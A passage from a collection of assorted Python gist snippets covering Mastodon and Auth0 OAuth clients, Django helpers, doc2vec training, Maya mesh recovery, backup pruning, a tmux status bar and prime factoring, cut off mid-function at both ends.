base = '-'.join(map(gen_word, [4] * 4))
link = "https://example.com/{}".format(base)
token = cls.normalize(base)
# Note the bug below, ask about subclass of this model.
return Token(id=id, link=link, token=token)
class Site(Base):
__tablename__ = 'site'
id = Column(GUID, primary_key=True)
name = Column(Text, nullable=False)
customer = Column(Text, nullable=False)
contact = Column(Text, nullable=True)
devices = relationship("Device")
cabinets = relationship("Cabinet")
# Leave TODO comments in, ask them to improve.
# TODO: Location(GPS)
# TODO: More contact fields?
class Cabinet(Base):
__tablename__ = 'cabinet'
id = Column(GUID, primary_key=True)
serial = Column(Text, nullable=False)
revision = Column(Text, nullable=False)
token = Column(GUID, ForeignKey('token.id'))
site = Column(GUID, ForeignKey('site.id'))
class Device(Base):
__tablename__ = 'device'
id = Column(GUID, primary_key=True)
boxid = Column(String(length=12), nullable=False)
kind = Column(Text, nullable=False)
token = Column(GUID, ForeignKey('token.id'))
site = Column(GUID, ForeignKey('site.id'), nullable=True)
deploy_date = Column(Date, nullable=True)
retire_date = Column(Date, nullable=True)
@validates('boxid')
def validate_token(self, key, boxid):
if not HEXIES.issuperset(set(boxid)):
raise ValueError("Non hex letter in boxid")
if not len(boxid) == 12:
raise ValueError("Box ID should be 12 long, no more, no less")
return boxid
```
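A small illustration of the two classmethods above; it needs no database session, and the concrete link shown in the comment is only indicative.

```python
# Hypothetical illustration; no session/engine is required for these calls.
t = Token.create()
print(t.link)     # e.g. https://example.com/Abcd-Efgh-Jkmn-Pqrt
print(t.token)    # the same words, lower-cased, confusables folded, separators dropped
# normalize() folds characters that are easy to confuse when typing a token:
print(Token.normalize('O0-l1 5u'))   # -> '00115v'
```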
#### File: hard-gists/7dc87b8d1dc16b025e7019113cc2de93/snippet.py
```python
from urllib.parse import urlunsplit
import requests
from oauthlib.oauth2 import LegacyApplicationClient
from requests_oauthlib import OAuth2Session
def register_app(client_name, host, redirect_uris='urn:ietf:wg:oauth:2.0:oob',
scopes='read write follow'):
"""Register application
Usage:
>>> d = register_app('myapp', host='pawoo.net')
>>> d
{'id': 1234, 'redirect_uri': 'urn:ietf:wg:oauth:2.0:oob', 'client_id': '...', 'client_secret': '...'}
"""
data = {
'client_name': client_name,
'redirect_uris': redirect_uris,
'scopes': scopes,
}
resp = requests.post("https://{host}/api/v1/apps".format(host=host), data=data)
resp.raise_for_status()
return resp.json()
def fetch_token(client_id, client_secret, email, password, host, scope=('read', 'write', 'follow')):
token_url = "https://{host}/oauth/token".format(host=host)
client = LegacyApplicationClient(client_id=client_id)
oauth = OAuth2Session(client=client)
token = oauth.fetch_token(token_url=token_url, username=email, password=password,
client_id=client_id, client_secret=client_secret, scope=scope)
return token
class Mstdn:
"""Mastodon API
Usage:
>>> token = fetch_token(...)
>>> mstdn = Mstdn(token)
>>> mstdn.toot("テスト")
"""
def __init__(self, token, scheme='https', host='pawoo.net'):
self.scheme = scheme
self.host = host
self.session = requests.Session()
self.session.headers.update({'Authorization': 'Bearer ' + token['access_token']})
def _build_url(self, path):
return urlunsplit([self.scheme, self.host, path, '', ''])
def _request(self, method, url, data=None, params=None):
kwargs = {
'data': data or {},
'params': params or {}
}
resp = self.session.request(method, url, **kwargs)
resp.raise_for_status()
return resp
def home_timeline(self):
url = self._build_url('/api/v1/timelines/home')
return self._request('get', url)
def toot(self, status):
url = self._build_url('/api/v1/statuses')
return self._request('post', url, data={'status': status})
```
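An end-to-end sketch tying `register_app`, `fetch_token`, and `Mstdn` together; the host and credentials are placeholders.

```python
# Hypothetical end-to-end flow; host and credentials below are placeholders.
if __name__ == '__main__':
    host = 'pawoo.net'
    app = register_app('myapp', host=host)
    token = fetch_token(app['client_id'], app['client_secret'],
                        '<EMAIL>', '<PASSWORD>', host=host)
    mstdn = Mstdn(token, host=host)
    mstdn.toot('Hello from the API')
    print(mstdn.home_timeline().json())
```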
#### File: hard-gists/7e9499ba7e436535fd94/snippet.py
```python
from django.db import transaction
class AtomicMixin(object):
"""
Ensures we rollback db transactions on exceptions.
Idea from https://github.com/tomchristie/django-rest-framework/pull/1204
"""
@transaction.atomic()
def dispatch(self, *args, **kwargs):
return super(AtomicMixin, self).dispatch(*args, **kwargs)
def handle_exception(self, *args, **kwargs):
response = super(AtomicMixin, self).handle_exception(*args, **kwargs)
if getattr(response, 'exception'):
# We've suppressed the exception but still need to rollback any transaction.
transaction.set_rollback(True)
return response
```
#### File: hard-gists/7eca8b9f0ff5b3bfb742/snippet.py
```python
import http.client
import ssl
import urllib.parse
def boxcarpush():
# Prepare the notification parameters
params = urllib.parse.urlencode({
'user_credentials': '<PASSWORD>',
'notification[title]': 'Menu Alert',
'notification[long_message]': 'Chicken and waffles are on the menu today!',
'notification[sound]': 'score'})
# Create a secure connection to Boxcar and POST the message
context = ssl.create_default_context()
conn = http.client.HTTPSConnection('new.boxcar.io', context=context)
conn.request('POST', '/api/notifications', params)
# Check the response
response = conn.getresponse()
print(response.status, response.reason)
data = response.read()
print(data)
# Clean up the connection
conn.close()
def get_daily_specials():
return '''Fried green tomatoes,
Chicken and waffles,
Beef stew,
Brussels sprouts,
Spam sandwich'''
def main():
menu = get_daily_specials()
if 'chicken and waffles' in menu.lower():
boxcarpush()
if __name__=='__main__':
main()
```
#### File: hard-gists/7f1737a750d8246d325e/snippet.py
```python
from lxml import etree
from elasticsearch.helpers import scan
from elasticsearch import Elasticsearch
from multiprocessing import Pool
import bz2
import gensim
import itertools
import logging
import nltk
import os
import re
import string
import random
import unicodedata
logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.ERROR)
logging.getLogger('gensim').setLevel(logging.INFO)
tokenizer = nltk.tokenize.RegexpTokenizer(r'\w+')
parser = etree.XMLParser(recover=True)
es = Elasticsearch(['localhost'])
PROCESSES = 5
def create_model():
model = gensim.models.Doc2Vec(size=300, window=8, min_count=10, workers=16)
model.build_vocab(sentence_generator())
alpha, min_alpha, passes = (0.025, 0.001, 10)
alpha_delta = (alpha - min_alpha) / passes
for epoch in range(0, passes):
model.alpha, model.min_alpha = alpha, alpha
model.train(sentence_generator())
alpha -= alpha_delta
print('Finished epoch {}'.format(epoch))
model.save('doc2vec_model_300_10')
def get_sentences(document):
sentences = nltk.sent_tokenize(document['fields']['content'][0])
sentences = [tokenize(sent) for sent in sentences]
final = []
for sentence_num, sentence in enumerate(sentences):
if len(sentence) == 0:
continue
final.append(gensim.models.doc2vec.TaggedDocument(
words=sentence,
tags=['{}_{}'.format(document['_id'], sentence_num)]
))
return final
def sentence_generator():
documents = scan(
es, index='nabu',
scroll='30m', fields='content'
)
with Pool(processes=PROCESSES) as p:
for sentences in p.imap(get_sentences, documents):
for sentence in sentences:
yield sentence
es_replace = re.compile(r'es$')
s_replace = re.compile(r's$')
def remove_plural(token):
token = es_replace.sub('', token)
token = s_replace.sub('', token)
return token
num_replace = re.compile(r'[0-9]+')
def tokenize(sentence):
token_list = []
for token in tokenizer.tokenize(sentence):
nkfd_form = unicodedata.normalize('NFKD', token)
only_ascii = nkfd_form.encode('ASCII', 'ignore').decode('ascii')
final = num_replace.sub('DDD', only_ascii)
token_list.append(remove_plural(final.strip().lower()))
return token_list
if __name__ == '__main__':
create_model()
```
#### File: hard-gists/7f73238f55b7158b6852/snippet.py
```python
from django import forms
from django.forms.forms import NON_FIELD_ERRORS
class AddErrorMixin(object):
"Backport add_error() for django <1.7"
def add_error(self, field, msg):
field = field or NON_FIELD_ERRORS
if field in self._errors:
self._errors[field].append(msg)
else:
self._errors[field] = self.error_class([msg])
class ExampleForm(AddErrorMixin, forms.Form):
pass
```
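A short sketch of the backported `add_error()` used inside `clean()` on Django < 1.7; the form and field names are invented.

```python
# Hypothetical usage: attach errors to a single field or to the whole form.
class SignupForm(AddErrorMixin, forms.Form):
    email = forms.EmailField()
    confirm_email = forms.EmailField()

    def clean(self):
        cleaned = super(SignupForm, self).clean()
        if cleaned.get('email') != cleaned.get('confirm_email'):
            self.add_error('confirm_email', 'Addresses do not match.')
            self.add_error(None, 'Please double-check your input.')
        return cleaned
```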
#### File: hard-gists/7f79c85c8883268660bd/snippet.py
```python
import pymel.core as pm
import re
def parseVtxIdx(idxList):
"""convert vertex index list from strings to indexes.
idxList : [u'vtx[1]', u'vtx[3]', u'vtx[6]', u'vtx[8]', u'vtx[12:13]']
return : [1,3,6,8,12,13]
"""
parseIdxList = []
for idxName in idxList:
match = re.search(r'\[.+\]', idxName)
if match:
content = match.group()[1:-1]
if ':' in content:
tokens = content.split(':')
startTok = int(tokens[0])
endTok = int(tokens[1])
for rangeIdx in range(startTok, endTok + 1):
parseIdxList.append(rangeIdx)
else:
parseIdxList.append(int(content))
return parseIdxList
def recoverMesh(bsNode, weightIdx):
"""recover the blendshape target from blendshape target attribute.
usually blendshape targets are deleted after editing to save disk space and
save / load / calculation time.
but if you need to re-edit them later, there's no option in current maya tool
to do so.
"""
bsNode = pm.PyNode(bsNode)
bsNode.envelope.set(0)
aliasName = pm.aliasAttr(bsNode.weight[weightIdx], query=True)
finalMeshes = pm.listFuture(bsNode,type="mesh")
finalParent = None
newParent = None
# it is a group blendshapes
if len(finalMeshes) > 1:
finalParent = finalMeshes[0].getParent()
if finalParent:
newParent = pm.createNode('transform')
pm.rename(newParent, aliasName)
pm.delete(pm.parentConstraint(finalParent, newParent, mo=0))
for finalIdx, finalMesh in enumerate(finalMeshes):
newMesh = pm.duplicate(finalMesh)[0]
newMeshShape = newMesh.getShape()
vtxDeltaList = bsNode.inputTarget[finalIdx].inputTargetGroup[weightIdx].inputTargetItem[6000].inputPointsTarget.get()
vtxIdxList = bsNode.inputTarget[finalIdx].inputTargetGroup[weightIdx].inputTargetItem[6000].inputComponentsTarget.get()
# get bs shape
if vtxIdxList:
# need to convert [u'vtx[8]', u'vtx[11:13]] to [8,11,12,13]
singleIdxList = parseVtxIdx(vtxIdxList)
for vtxIdx,moveAmount in zip(singleIdxList,vtxDeltaList):
pm.move('%s.vtx[%d]'%(newMesh.name(),vtxIdx),moveAmount,r=1)
newMeshShape.worldMesh[0] >> bsNode.inputTarget[finalIdx].inputTargetGroup[weightIdx].inputTargetItem[6000].inputGeomTarget
if newParent:
pm.parent(newMesh,newParent)
pm.rename(newMesh,finalMesh.name())
else:
pm.rename(newMesh,aliasName)
if newMesh.getParent():
pm.parent(newMesh,world=1)
bsNode.envelope.set(1)
if newParent:
return newParent
elif newMesh:
return newMesh
recoverMesh("blendShape1",0)
```
#### File: hard-gists/8096192/snippet.py
```python
import re
from datetime import date
from path import path
class BackupPrune:
name_pattern = re.compile(
r'^(?P<year>\d{4})-(?P<month>\d{2})-(?P<day>\d{2})'
r'\.sql\.gz$'
)
keep_weekday = 6
keep_daily = 7
def __init__(self, backup_dir):
self.backup_dir = path(backup_dir)
self.today = date.today()
def enumerate(self):
for backup_path in sorted(self.backup_dir.listdir()):
match = self.name_pattern.match(backup_path.name)
if match:
backup_date = date(
int(match.group('year')),
int(match.group('month')),
int(match.group('day')),
)
yield (backup_date, backup_path)
def keep(self, backup_date):
if backup_date.weekday() == self.keep_weekday:
return True
elif (self.today - backup_date).days < self.keep_daily:
return True
else:
return False
def test(self):
for backup_date, backup_path in self.enumerate():
if not self.keep(backup_date):
print(u'✘', backup_path.name)
backup_path.unlink()
def main():
backup_dir = path(__file__).abspath().parent
bp = BackupPrune(backup_dir)
bp.test()
if __name__ == '__main__':
main()
```
#### File: hard-gists/809867d7110acbde87af/snippet.py
```python
import subprocess
from operator import itemgetter, methodcaller
import dbus
def get_current_track():
bus = dbus.SessionBus()
player = bus.get_object('com.spotify.qt', '/')
iface = dbus.Interface(player, 'org.freedesktop.MediaPlayer2')
info = iface.GetMetadata()
if not info:
return ['']
else:
artist = info['xesam:artist'][0]
title = info['xesam:title']
return [
u'♫ {artist} - {title} ♫'.format(artist=artist, title=title).encode('utf8')
]
def get_current_state(battery):
state = ''
pct = 100.0
output = subprocess.check_output(
'upower -i {} | grep -E "state|percentage"'.format(battery), shell=True
).strip().split('\n')
for line in map(methodcaller('strip'), output):
name, _, data = line.rpartition(' ')
if 'state' in name:
state = data
elif 'percentage' in name:
pct = float(data.rstrip('%'))
return state, pct
def as_hearts(percent, factor=10):
# FIXME: Show 1 full heart for every 10% it has
heart = u'♥'.encode('utf8')
num_full = int(round(percent / factor))
num_empty = (100 / factor) - num_full
full_hearts = heart * num_full
empty_hearts = heart * num_empty
return '#[fg=red,bg=black]{}#[fg=white,bg=black]{}'.format(full_hearts, empty_hearts)
def get_memory():
total = None
free = None
buffers = None
cached = None
with open('/proc/meminfo', 'r') as f:
for line in f:
if line.startswith('MemTotal:'):
total = float(line.strip().split(' ')[-2])
elif line.startswith('MemFree:'):
free = float(line.strip().split(' ')[-2])
elif line.startswith('Buffers:'):
buffers = float(line.strip().split(' ')[-2])
elif line.startswith('Cached:'):
cached = float(line.strip().split(' ')[-2])
# Convert to MB
total /= 1024.0
free /= 1024.0
buffers /= 1024.0
cached /= 1024.0
used = total - free - buffers - cached
pct = (used / total) * 100.0
if pct < 85:
color = '#[fg=white,bg=black]'
elif pct < 95:
color = '#[fg=yellow,bg=black]'
else:
color = '#[fg=red,bg=black]'
kwargs = {
'color': color,
'reset': '#[fg=white,bg=black]',
'free': int(used),
'total': int(total),
}
return ['{color}MEM: {free}/{total}MB{reset}'.format(**kwargs)]
def get_battery(factor=10):
status = []
output = subprocess.check_output('upower -e | grep BAT', shell=True).strip().split('\n')
batteries = map(methodcaller('strip'), output)
for battery in batteries:
_, _, name = battery.rpartition('_')
state, pct = get_current_state(battery)
if pct > 25:
color = '#[fg=white,bg=black]'
elif pct > 15:
color = '#[fg=yellow,bg=black]'
else:
color = '#[fg=red,bg=black]'
if state == 'charging':
color = '#[fg=green,bg=black]+'
status.append((name, as_hearts(pct, factor=factor), color))
return ['{}{}: {}#[fg=white,bg=black]'.format(c, b, h) for b, h, c in sorted(status, key=itemgetter(0))]
def get_loadavg():
with open('/proc/loadavg', 'r') as f:
loadavg = float(f.readline().strip().split(' ')[0])
if loadavg < 2.5:
color = '#[fg=white,bg=black]'
elif loadavg < 5:
color = '#[fg=yellow,bg=black]'
else:
color = '#[fg=red,bg=black]'
kwargs = {
'color': color,
'reset': '#[fg=white,bg=black]',
'load': '{:.2f}'.format(loadavg),
}
return ['{color}LOAD: {load}{reset}'.format(**kwargs)]
def main():
factor = 20
lines = []
lines += get_current_track()
lines += get_loadavg()
lines += get_memory()
lines += get_battery(factor=factor)
print '{} '.format(' | '.join(lines))
if __name__ == '__main__':
main()
```
#### File: hard-gists/809993/snippet.py
```python
from sandbox import models
from tastypie import fields
from apibase.resources import CamayakModelResource
from django.conf.urls.defaults import url
class ModelResource(CamayakModelResource):
def override_urls(self):
urls = []
for name, field in self.fields.items():
if isinstance(field, fields.ToManyField):
print field.to_class
resource = r"^(?P<resource_name>{resource_name})/(?P<{related_name}>.+)/{related_resource}/$".format(
resource_name=self._meta.resource_name,
related_name=field.related_name,
related_resource=field.attribute,
)
resource = url(resource, field.to_class().wrap_view('get_list'), name="api_dispatch_detail")
urls.append(resource)
return urls
class HandResource(ModelResource):
fingers = fields.ToManyField('sandbox.api.FingerResource', 'fingers', 'hand')
class Meta:
queryset = models.Hand.objects.all()
resource_name = 'hands'
api_name = 'v1'
class FingerResource(ModelResource):
hand = fields.ForeignKey('sandbox.api.HandResource', 'hand')
bones = fields.ToManyField('sandbox.api.BoneResource', 'bones', 'finger')
class Meta:
queryset = models.Finger.objects.all()
resource_name = 'fingers'
api_name = 'v1'
filtering = {
"hand": ('exact',),
}
class BoneResource(ModelResource):
finger = fields.ForeignKey('sandbox.api.BoneResource', 'finger')
class Meta:
queryset = models.Bone.objects.all()
resource_name = 'bones'
api_name = 'v1'
filtering = {
"finger": ('exact',),
}
```
#### File: hard-gists/814599/snippet.py
```python
from MySQLdb.cursors import SSDictCursor
def iterate_query(query, connection, arraysize=1):
c = connection.cursor(cursorclass=SSDictCursor)
c.execute(query)
while True:
nextrows = c.fetchmany(arraysize)
if not nextrows:
break
for row in nextrows:
yield row
c.close()
results = iterate_query(SQL, conn, arraysize=100)
for row_dict in results:
print row_dict
```
#### File: hard-gists/8149412/snippet.py
```python
import webapp2
import urllib2
import urllib
import json
## CHANGE THIS
CLIENT_ID = "vYPeq7LGf1utg2dbDlGKCwGKgy94lPH0"
CLIENT_SECRET = "<KEY>"
DOMAIN = "contoso.auth0.com"
CALLBACK_URL = "http://localhost:8080/callback"
MAIN_PAGE_HTML = """\
<html>
<body>
<script src="https://cdn.auth0.com/w2/auth0-widget-2.6.min.js"></script>
<script type="text/javascript">
var widget = new Auth0Widget({
domain: '%s',
clientID: '%s',
callbackURL: '%s'
});
</script>
<button onclick="widget.signin()">Login</button>
</body>
</html>
""" % (DOMAIN, CLIENT_ID, CALLBACK_URL)
class MainPage(webapp2.RequestHandler):
def get(self):
self.response.write(MAIN_PAGE_HTML)
class LoginCallback(webapp2.RequestHandler):
def get(self):
code = self.request.get("code")
base_url = "https://{domain}".format(domain=DOMAIN)
data = urllib.urlencode([('client_id', CLIENT_ID),
('redirect_uri', CALLBACK_URL),
('client_secret', CLIENT_SECRET),
('code', code),
('grant_type', 'authorization_code')])
req = urllib2.Request(base_url + "/oauth/token", data)
response = urllib2.urlopen(req)
oauth = json.loads(response.read())
userinfo = base_url + "/userinfo?access_token=" + oauth['access_token']
response = urllib2.urlopen(userinfo)
data = response.read()
## print user data
self.response.write(data)
application = webapp2.WSGIApplication([
('/', MainPage),
('/callback', LoginCallback)
], debug=True)
```
#### File: hard-gists/816134462577399ee8b2/snippet.py
```python
import theano.tensor as T
import numpy as np
import theano
class rmsprop(object):
"""
RMSProp with nesterov momentum and gradient rescaling
"""
def __init__(self, params):
self.running_square_ = [theano.shared(np.zeros_like(p.get_value()))
for p in params]
self.running_avg_ = [theano.shared(np.zeros_like(p.get_value()))
for p in params]
self.memory_ = [theano.shared(np.zeros_like(p.get_value()))
for p in params]
def updates(self, params, grads, learning_rate, momentum, rescale=5.):
grad_norm = T.sqrt(sum(map(lambda x: T.sqr(x).sum(), grads)))
not_finite = T.or_(T.isnan(grad_norm), T.isinf(grad_norm))
grad_norm = T.sqrt(grad_norm)
scaling_num = rescale
scaling_den = T.maximum(rescale, grad_norm)
# Magic constants
combination_coeff = 0.9
minimum_grad = 1E-4
updates = []
for n, (param, grad) in enumerate(zip(params, grads)):
grad = T.switch(not_finite, 0.1 * param,
grad * (scaling_num / scaling_den))
old_square = self.running_square_[n]
new_square = combination_coeff * old_square + (
1. - combination_coeff) * T.sqr(grad)
old_avg = self.running_avg_[n]
new_avg = combination_coeff * old_avg + (
1. - combination_coeff) * grad
rms_grad = T.sqrt(new_square - new_avg ** 2)
rms_grad = T.maximum(rms_grad, minimum_grad)
memory = self.memory_[n]
update = momentum * memory - learning_rate * grad / rms_grad
update2 = momentum * momentum * memory - (
1 + momentum) * learning_rate * grad / rms_grad
updates.append((old_square, new_square))
updates.append((old_avg, new_avg))
updates.append((memory, update))
updates.append((param, param + update2))
return updates
class sgd_nesterov(object):
def __init__(self, params):
self.memory_ = [theano.shared(np.zeros_like(p.get_value()))
for p in params]
def updates(self, params, grads, learning_rate, momentum):
updates = []
for n, (param, grad) in enumerate(zip(params, grads)):
memory = self.memory_[n]
update = momentum * memory - learning_rate * grad
update2 = momentum * momentum * memory - (
1 + momentum) * learning_rate * grad
updates.append((memory, update))
updates.append((param, param + update2))
return updates
class sgd(object):
# Only here for API conformity with other optimizers
def __init__(self, params):
pass
def updates(self, params, grads, learning_rate):
updates = []
for n, (param, grad) in enumerate(zip(params, grads)):
updates.append((param, param - learning_rate * grad))
return updates
"""
Usage:
grads = T.grad(cost, self.params)
#opt = sgd_nesterov(self.params)
opt = rmsprop(self.params)
updates = opt.updates(self.params, grads,
learning_rate / np.cast['float32'](self.batch_size),
momentum)
"""
```
#### File: hard-gists/8169809/snippet.py
```python
import bs4, collections, console, requests, scene
tkColorDict = collections.OrderedDict() # key = tkinter color name
def loadTkColorDict(): # will automatically be called by getColor() if needed
tkColorURL = 'http://www.tcl.tk/man/tcl8.6/TkCmd/colors.htm'
print('Loading tkinter colors from: ' + tkColorURL)
tkColorSoup = bs4.BeautifulSoup(requests.get(tkColorURL).text).tbody
print('Soup is ready. Creating color table...')
for tableRow in tkColorSoup.find_all('tr'):
colorInfo = [x.text for x in tableRow.find_all('p')]
if colorInfo[0] != 'Name': # skip the table header
tkColorDict[colorInfo[0]] = (int(colorInfo[1]) / 255.0, # red
int(colorInfo[2]) / 255.0, # green
int(colorInfo[3]) / 255.0) # blue
# optionaly show the results...
for colorName in tkColorDict: # 752 colors
#console.set_color(*tkColorDict[colorName]) # some colors are not visible
print('{:<22} = {}'.format(colorName, tkColorDict[colorName]))
print('tkColorDict now contains {} colors.\n'.format(len(tkColorDict)))
def getColor(inColorName = 'grey'):
if not tkColorDict: # if tkColorDict has not been initialized
loadTkColorDict() # then put tkinter colors into tkColorDict
try:
return scene.Color(*tkColorDict[inColorName])
except KeyError:
print("'{}' is not a valid color. Substituting grey...".format(inColorName))
return getColor()
if __name__ == '__main__':
lgy = getColor('light goldenrod yellow')
    #console.set_color(lgy.r, lgy.g, lgy.b) # some colors are not visible
print("getColor('{}') = ({}, {}, {})".format('light goldenrod yellow', lgy.r, lgy.g, lgy.b))
testColorNames = ('black white red green blue Bob').split()
for testColorName in testColorNames:
testColor = getColor(testColorName)
console.set_color(testColor.r, testColor.g, testColor.b)
print("getColor('{}') = ({}, {}, {})".format(testColorName, testColor.r, testColor.g, testColor.b))
console.set_color(0, 0, 0) # back to black
```
#### File: hard-gists/817a70706587da3bd862835c59ef584e/snippet.py
```python
import os
import io
from PIL import Image
from django.core.urlresolvers import reverse
from django.conf import settings
from rest_framework import status
from rest_framework.test import APITestCase
from rest_framework.authtoken.models import Token
from rest_framework.renderers import JSONRenderer
# Custom user model based on Django Auth AbstractUser
from account.models import User
class CrewUploadPhotoTests(APITestCase):
fixtures = []
maxDiff = None
def setUp(self):
# Normal user
self.normal_user = User.objects.create(
first_name="Bob",
last_name="Green",
username="<EMAIL>",
email="<EMAIL>",
is_active=True,
is_staff=False)
self.normal_user.set_password('<PASSWORD>')
self.normal_user.save()
self.normal_token, created = Token.objects.get_or_create(
user=self.normal_user)
def generate_photo_file(self):
file = io.BytesIO()
image = Image.new('RGBA', size=(100, 100), color=(155, 0, 0))
image.save(file, 'png')
file.name = 'test.png'
file.seek(0)
return file
def test_upload_photo(self):
"""
Test if we can upload a photo
"""
self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.normal_token.key)
url = reverse('crew-api:upload-photo', args=[self.normal_user.crew.uuid])
photo_file = self.generate_photo_file()
data = {
'photo':photo_file
}
response = self.client.post(url, data, format='multipart')
self.assertEqual(response.status_code, status.HTTP_200_OK)
```
#### File: hard-gists/821473a1596f1429024cb1eadb471927/snippet.py
```python
import logging
from optparse import OptionParser
import os
from osgeo import ogr
def log_file_fields(filename):
print("File: " + filename)
source = ogr.Open(filename)
for i in range(source.GetLayerCount()):
layer = source.GetLayerByIndex(i)
layerName = layer.GetName()
print("Layer: " + layerName)
stringFields = []
layerDefinition = layer.GetLayerDefn()
for n in range(layerDefinition.GetFieldCount()):
fieldDefinition = layerDefinition.GetFieldDefn(n)
fieldName = fieldDefinition.GetName()
fieldTypeCode = fieldDefinition.GetType()
fieldType = fieldDefinition.GetFieldTypeName(fieldTypeCode)
if fieldType == "String":
stringFields.append(fieldName)
print("String Fields:")
for field in stringFields:
sql = 'SELECT %s FROM %s' % (field, layerName)
fieldLayer = source.ExecuteSQL(sql)
values = {}
for i, feature in enumerate(fieldLayer):
values[feature.GetField(0)] = values.get(feature.GetField(0), 0) + 1
print("Field: " + field)
for key in sorted(values.keys()):
print("'%s': %d" % (key, values[key]))
print("\n")
def _main():
usage = "usage: %prog"
parser = OptionParser(usage=usage,
description="")
parser.add_option("-d", "--debug", action="store_true", dest="debug",
help="Turn on debug logging")
parser.add_option("-q", "--quiet", action="store_true", dest="quiet",
help="turn off all logging")
(options, args) = parser.parse_args()
logging.basicConfig(level=logging.DEBUG if options.debug else
(logging.ERROR if options.quiet else logging.INFO))
for arg in args:
log_file_fields(arg)
if __name__ == "__main__":
_main()
```
#### File: hard-gists/824628/snippet.py
```python
from django.core.management.base import BaseCommand, CommandError
from optparse import make_option
from datetime import datetime
import simplejson as json
import urllib, urllib2, time
from hotspot.twitterklout.models import Tweet, Tweeter, Hashtag, Event, Location
#from django.db import models
class Command(BaseCommand):
option_list = BaseCommand.option_list + (
make_option('--long', '-l', dest='long',
help='Help for the long options'),
)
help = 'this is an automated script (use Cron) to collect data'
#self.can_import_settings = True
#pullDataFromTwitter
def handle(self, **options):
print 'oh hai wrld'
events = Event
querySet = events.objects.all()
for events in querySet:
self.pullTweets(events)
#pullDataFromTwitter(Event.objects.filter(isActive = True))
def pullTweets(self, obj):
#print obj.name
if obj.isActive() == True:
url = 'http://search.twitter.com/search.json?q=%23' + obj.Hashtag.tag
print obj.name
import twitter
api = twitter.Api()
try:
#req = urllib2.Request(url)
#response = urllib2.urlopen(req)
#the_page = response.read()
#print the_page
#loadedJson = json.loads(the_page)
#loadedJson = json.loads(response.read())
results = api.GetSearch(term=obj.Hashtag.tag)
#print results[0].text
flag = 0
while (results[flag].id != obj.Hashtag.lastStatusID) and (flag !=10):
print results[flag].text
print results[flag].user.screen_name
newTweeter = Tweeter(username=results[flag].user.screen_name)
users = Tweeter
userquerySet = Tweeter.objects.all()
userTest = False
for user in userquerySet:
if user.username == results[flag].user.screen_name:
userTest=True
if userTest == True:
newTweeter = Tweeter(username=results[flag].user.screen_name)
newTweeter.save()
newTweet = Tweet(content=results[flag].text, Tweeter=user)
newTweet.save()
break
flag = flag + 1
#obj.Hashtag.lastStatusID.save(results[0].id)
#obj.Hashtag.lastStatusID.save()
#print self.sentiment
except Exception, detail:
print "Err ", detail
```
#### File: hard-gists/8336771/snippet.py
```python
import sublime, sublime_plugin
BLOCKLEN = 4
class TypeFileOutCommand(sublime_plugin.TextCommand):
def nextchar(self):
if self.body:
totype = []
while 1:
try:
ch = self.body.pop(0)
except IndexError:
break
totype.append(ch)
if ch in ["\n", " "] or len(totype) > BLOCKLEN:
break
self.view.insert(self.edit, self.view.sel()[0].begin(), "".join(totype))
timeout = 10
if "\n" in totype:
timeout = 250
elif " " in totype:
timeout = 80
sublime.set_timeout(self.nextchar, timeout)
def run(self, edit):
self.edit = edit
# First, read everything in this view
reverything = sublime.Region(0, self.view.size())
self.body = list(self.view.substr(reverything))
self.view.erase(edit, reverything)
sublime.set_timeout(self.nextchar, 2000)
```
#### File: hard-gists/839f6a3534002a6a29d819666a28bf5e/snippet.py
```python
import random
from queue import *
def gcd(a,b):
while b:
a,b=b,a%b
return a
def expo(a,b):
x,y=1,a
while(b>0):
if(b&1):
x=x*y
y=y*y
b>>=1
return x
primes=[0]*100000
def sieve():
primes[1]=1
primes[2]=2
j=4
while(j<100000):
primes[j]=2
j+=2
j=3
while(j<100000):
if primes[j]==0:
primes[j]=j
i=j*j
k=j<<1
while(i<100000):
primes[i]=j
i+=k
j+=2
def rabin_miller(p):
if(p<100000):
return primes[p]==p
if(p%2==0):
return False
s=p-1
while(s%2==0):
s>>=1
for i in range(5):
a=random.randrange(p-1)+1
temp=s
mod=pow(a,temp,p)
while(temp!=p-1 and mod!=1 and mod!=p-1):
mod=(mod*mod)%p
temp=temp*2
if(mod!=p-1 and temp%2==0):
return False
return True
def brent(N):
if(N%2==0):
return 2
if(N<100000):
return primes[N]
y,c,m = random.randint(1, N-1),random.randint(1, N-1),random.randint(1, N-1)
g,r,q = 1,1,1
while g==1:
x=y
for i in range(r):
y=((y*y)%N+c)%N
k=0
while(k<r and g==1):
ys=y
for i in range(min(m,r-k)):
y=((y*y)%N+c)%N
q=q*(abs(x-y))%N
g=gcd(q,N)
k=k+m
r=r*2
if g==N:
while True:
ys=((ys*ys)%N+c)%N
g=gcd(abs(x-ys),N)
if g>1:
break
return g
def factor(n):
Q_1=Queue()
Q_2=[]
Q_1.put(n)
while(not Q_1.empty()):
l=Q_1.get()
if(rabin_miller(l)):
Q_2.append(l)
continue
d=brent(l)
if(d==l):
Q_1.put(l)
else:
Q_1.put(d)
Q_1.put(l//d)
return Q_2
if __name__ == "__main__":
sieve()
t=int(input())
for test in range(t):
n=int(input())
if(n==1):
print ("Case %s: 1"%(test+1))
continue
L=factor(n)
L.sort()
i=0
ans=1
while(i<len(L)):
cnt=L.count(L[i])
pk=[0]*(cnt+1)
pk[0]=1
for j in range(cnt):
pk[j+1]=pk[j]*L[i]
temp=0
cnt+=1
val=cnt*2-1
for j in range(cnt):
temp+=val*pk[j]
val-=2
ans*=temp
i+=cnt-1
print ("Case %s: %s"%(test+1,ans))
```
#### File: hard-gists/8406352/snippet.py
```python
import gobject
import dbus
import dbus.mainloop.glib
import os
def property_changed(name, value, path, interface):
iface = interface[interface.rfind(".") + 1:]
val = str(value)
print "{%s.PropertyChanged} [%s] %s = %s" % (iface, path, name, val)
# we want this event: {Control.PropertyChanged} [/org/bluez/16797/hci0/dev_00_24_7E_51_F7_52] Connected = true
# and when that happens: pactl load-module module-loopback source=bluez_source.00_24_7E_51_F7_52
if iface == "Control" and name == "Connected" and val == "1":
bt_addr = "_".join(path.split('/')[-1].split('_')[1:])
cmd = "pactl load-module module-loopback source=bluez_source.%s" % bt_addr
os.system(cmd)
# here we want this event: {Control.PropertyChanged} [/org/bluez/16797/hci0/dev_00_24_7E_51_F7_52] Connected = false
# and when that happens, we unload all loopback modules whose source is our bluetooth device
elif iface == "Control" and name == "Connected" and val == "0":
bt_addr = "_".join(path.split('/')[-1].split('_')[1:])
